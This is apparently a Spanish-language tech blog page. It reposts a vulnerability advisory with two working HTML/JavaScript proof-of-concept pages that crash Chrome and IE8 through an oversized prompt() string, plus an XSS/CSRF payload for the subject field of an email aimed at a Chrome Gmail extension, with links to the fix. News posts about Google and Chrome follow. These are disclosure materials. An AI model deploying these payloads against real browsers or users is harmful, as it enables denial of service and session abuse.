In all cases OS X closes all Chrome Windows.( Chrome Crash)


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)


####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################


<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>


################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>

################# EOF ###################


############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
------------

thz Lost ;-)

¿Qué podemos esperar de Chrome 6?

22 julio 2010 Publicado por cLimbo 0 comentarios
Chrome es una delicia en muchos sentidos, pero aún así seguimos esperando ciertas mejoras en futuras versiones. De eso precisamente han hablado en Google recientemente, de lo que podemos esperar con la llegada de Chrome 6.

Resumiendo, hay dos nuevas funciones que muchos agradecerán si andan trabajando con diferentes ordenadores: la sincronización de las extensiones y el historial de forma parecida a como lo hacen ya los favoritos. Además de esto, hay otra característica notable, que es un mejor uso de los procesadores de múltiples núcleos para el manejo y visualización de imágenes de fondo.

Por otro lado, tendremos que esperar algo más para ver otras funciones que se venían comentando, quizás postergadas a la séptima entrega. En este paquete se encuentra el modo de Cliente Nativo para la ejecución de aplicaciones directamente sobre el navegador, así como la visualización de vídeos HTML5 a pantalla completa. Ya veis, algunas noticias buenas y otras menos buenas, pero seguro que estamos deseando probar las nuevas características que sí se han confirmado y que esperamos estén pronto entre nosotros.



Vía | Bitelia

Etiquetas: , , ,

HTTPS Everywhere, complemento de Firefox para la navegación privada

21 junio 2010 Publicado por cLimbo 0 comentarios
HTTPS Everywhere es una extensión para el navegador Firefox creada por la Electronic Frontier Foundation (EFF) en colaboración con The Tor Project. Sirve para forzar el cifrado de la información enviada o recibida entre el navegador y los sitios web que soporten el protocolo HTTPS.

La EFF, para quienes no lo sepan, es una organización civil estadounidense siempre preocupada por difundir y defender los derechos de los ciudadanos en la red. Unos de esos derechos fundamentales es, por supuesto, la privacidad. Con la creación de HTTPS Everywhere para Firefox, la EFF facilita el soporte para el cifrado HTTPS sobre todo bajo dos circunstancias:

  1. Por defecto el sitio ofrece páginas web sin cifrar.
  2. Algunas páginas van cifradas (como cuando llenamos ciertos formularios) con enlaces que nos devuelven al sitio sin cifrar.

Lo que HTTPS Everywhere hace es reescribir todas esas peticiones originalmente hechas en HTTP en peticiones HTTPS. La instalación del complemento es tan secilla como la de cualquier otro. Y aquí reitero esto: el plugin funcionará únicamente en sitios web que soporten HTTPS, por ejemplo. De hecho, por defecto soporta estos y otros sitios web:

HTTPS Everywhere no es perfecto. Imaginen la dificultad para saber por anticipado si el contenido del sitio http://dominio.com es idéntico al de https://seguro.dominio.com. Con esto en mente, el complemento nos permite definir nuestro propio conjunto de sitios seguros —además de los mencionados— usando expresiones regulares con JavaScript.

Creo que HTTPS Everywhere debe ser un complemento indispensable para cualquier navegante interesado en mejorar su privacidad y seguridad en la red —aunque también dilatar gracias a SSL/TSL.



Vía | Bitelia

Gmail Checker plus Chrome extension XSS

03 junio 2010 Publicado por cLimbo 0 comentarios
######################################
Gmail Checker plus Chrome extension XSS
Extensión: https://chrome.google.com/extensions/detail/mihcahmgecmbnbcchbopgniflfhgnkff
Reportado por: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
Exploit disponible:
#######################################

En este caso "Google Mail Checker Plus" la versión 1.1.7 (02/10/2010) tiene un bug que permite a atacantes para realizar ataques XSS.

Todas las extensiones se ejecutan sobre su origen y no hay forma de alterar datos o la extensión para obtener datos sensibles como; cuentas de correo electrónico, contraseñas, etcétera.


Podemos observar cuántos usuarios se han instalado esta extensión =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe 303,711 users (WoW)

############
Explicación
############

Google Mail Checker Plus permite a los usuarios ver cuando tienen un nuevo correo y
ver una vista previa del correo...

Si un atacante compone un nuevo correo con el código HTML o JavaScript en el campo del asunto y lo envía a la víctima, el código se ejecuta cuando haga click la víctima en la extensión para ver el correo y la víctima cuando acepte la alerta y ver una vista previa del correo el iframe se ejecutará a su vez.

Gmail es un lugar seguro, pero la extensión a su manejo, puede ser un potencial vector para atacarlo.


Por ejemplo; podríamos enviar un correo electrónico que accione el cierre de sesión en GMail y ponemos en el asunto:

"><iframe src="https://mail.google.com/mail/?logout&hl=es"<>/iframe>

Con esto se cerraría la sesion de GMail, se trata de un XSRF, y, en el caso de lo que tú dices es ejecutado en el contexto y el valor location.href es: "about:blank"

Por lo que tenemos disputas en: http://code.google.com/p/chromium/issues/detail?id=45401

El desarrollador ha comunicado una versión del parche en trunk: http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js

Podéis bajarlo y copiarlo a la carpeta de la extensión para solventar el problema.

Ver Diff: http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

----

thz Lost ;-)
Etiquetas: , , , , ,

Google ya puede usarse mediante cifrado SSL (aún BETA)

22 mayo 2010 Publicado por cLimbo 0 comentarios
Los usuarios nos preocupamos cada vez más por la seguridad y privacidad de los datos que enviamos y recibimos a diario, por ello Google quiere reforzar su compromiso en esté sentido y está comenzado a ofrecer la posibilidad de usar cifrado SSL en su buscador.

Para probar el buscador de Google con cifrado SSL no tenemos más que poner https://www.google.com, pero ojo que en algunos casos al intentar acceder nos redirecciona a la versión normal del buscador, seguramente tendremos que esperar para que se vaya habilitando esta opción para todos.

Hace ya tiempo que está opción esta disponible en otros servicios de Google como Gmail, que comenzó a tenerla de forma opcional y ha pasado a usarse por defecto. Por el momento el cifrado SSL no se encuentra activado por defecto en el buscador por que requiere un mayor tiempo de carga al tener que cifrar los datos antes de enviarlos, además de no mostrar algunos resultados, como sería la búsqueda de imágenes o mapas.

Algunos usuarios que han probado ya el buscador con esta nueva opción dicen no notar demasiada diferencia en la búsqueda de resultados, pero ya sabemos que Google siempre quiere ofrecer los contenidos de sus páginas los más rápido posible, sobre todo en el buscador, que con el cifrado SSL se encuentra por el momento en fase beta y como vemos en la imagen superior añade un distintivo del cifrado para que el usuario pueda distinguir claramente en que versión del buscador se encuentra en cada momento.



Vía | ALT1040

Etiquetas: , , , ,

Arrancando Chrome OS desde una memoria USB

26 noviembre 2009 Publicado por cLimbo 0 comentarios
De esas cosas que cuentas los días para que suceda: alguien llamado Hexxeh ha logrado adaptar un build de Chrome OS (Chromium) para que arranque y funcione desde una memoria USB.

Las instrucciones para lograrlo son lo suficientemente sencillas (Windows, Mac OS X, Linux). La imagen del sistema operativo puede ser descargado vía BitTorrent (por ejemplo)

…y mientras estamos descargando/instalando, podemos ver el video que los chicos de Engadget han hecho mostrando la velocidad del sistema operativo, que sinceramente sorprende bastante.




Vía | ALT1040

Google nos cuenta sus 16 predicciones para el 2009

29 diciembre 2008 Publicado por cLimbo 0 comentarios

Si hay una empresa de la cual tenemos que estar pendiente a cada momento es Google. ¿Por qué? Bueno, básicamente porque no sólo tiene el mejor servicio buscador del mundo sino también porque muchas veces propone nuevos proyectos realmente revolucionarios.

Esta vez Alex Chitu, la persona que está detrás del famosísimo blog Google Operating System, hizo una lista de 16 cosas que tenemos que esperar de Google en el 2009. Se las traduzco:

  1. Google Chrome tendrá el 10% del mercado.
  2. El buscador de Google perderá una parte significante del mercado porque Live (el servicio de Microsoft) se consolidará.
  3. El servicio de Preguntas y Respuestas (Google Q&A), utilizado en los foros de ayuda de Google, pasará a formar parte de Google Apps.
  4. GrandCentral (servicio telefónico que compró la empresa en julio del 2007) estará públicamente disponible en Estados Unidos y su interfaz se integrará con Gmail.
  5. Google lanzará un navegador para teléfonos móviles que no utilicen Android.
  6. Google Bookmarks mejorará la forma en que manejemos nuestros favoritos. Permitirá agregar etiquetas, compartir enlaces y interfaces intuitivas.
  7. Google incorporará algunas características de Chrome en otros navegadores.
  8. Google Translate se integrará con muchos de los servicios y aplicaciones de Google.
  9. Google Reader listará notas y entradas populares que serán compartidas por la comunidad y nos podremos suscribir los archivos OPML de forma dinámica.
  10. Google Maps Live mostrará cámaras que permitirán hacer streaming desde todo el mundo. Incluirá también tabs para Google Earth y las ediciones y reseñas de tus contactos.
  11. Google Contacts se convertirá en una aplicación independiente y ofrecerá búsquedas avanzadas y sincronización de datos.
  12. Los esfuerzos de Google por promocionar Chrome harán que cambie la percepción de la gente sobre la empresa. Algo así como lo que sentimos con Microsoft.
  13. Muchos empleados famosos de Google y realmente importantes, como Marissa Mayer, dejarán la empresa.
  14. Google Apps comenzará a ser atractivo nuevamente una vez que el App Engine sea finalmente publicado.
  15. Anuncios personalizados para usuarios que estén logueados.
  16. OneGoogle será una nueva interfaz que unirá todas las aplicaciones de la empresa para que uno pueda usar Gmail, Google Calendar, Google Docs sin tener que abrir nuevas webs y perder tiempo.

¿Se cumplirá alguna de todas estas ideas? Algunas son realmente simples de imaginar como por ejemplo que Google Maps permitirá realizar streaming desde cualquier lugar del mundo aunque, muchas otras, como por ejemplo que Marissa Mayer dejará la empresa, probablemente nadie pueda verlo venir.

Fuente: ALT1040.

Etiquetas: , ,